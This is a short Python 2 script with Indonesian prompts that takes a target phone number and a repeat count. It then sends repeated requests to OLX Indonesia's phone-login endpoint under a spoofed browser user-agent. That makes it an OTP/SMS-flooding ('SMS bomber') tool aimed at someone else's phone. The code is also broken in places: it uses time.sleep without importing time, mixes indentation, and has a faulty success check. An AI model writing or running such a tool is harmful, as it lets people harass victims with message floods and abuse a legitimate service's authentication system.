import mechanize, requests, random, sys, os, re
from time import sleep
from cookielib import LWPCookieJar as Cookie
from requests.exceptions import ConnectionError
Phone = raw_input("\x1b[1;97m{\x1b[1;94mmasukan nomor\x1b[1;97m}:\x1b[1;92m")
jl = int(input("\x1b[1;97m{\x1b[1;94mmasukan jumlah\x1b[1;97m}:\x1b[1;92m"))
def Olx(Phone):
        for i in range(jl):
            time.sleep(3)
       	    headers = {
  	    'user-agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9',
	    'referer' : 'https://www.olx.co.id/'
	    }
	
	    data = {
	    'grantType' : 'phone',
	    'phone' : Phone,
	    'language' : ''
	    }
		
            Sess = requests.Session()
            Sess.cookies = Cookie('.cookieslog')
	    Sess.headers = headers
		
	    postData = Sess.post('https://www.olx.co.id/api/auth/authenticate', json = data, allow_redirects = True)
		
	    if 'PIN' and 'token' in postData.text:
	    	   print('\x1b[1;97m{\x1b[1;92mSuccess\x1b[1;97m}')
	    	   Sess.cookies.save()
	    		
	    else:
		   print('\x1b[1;97m{\x1b[1;91mGagal\x1b[1;97m}')
			
Olx(Phone)


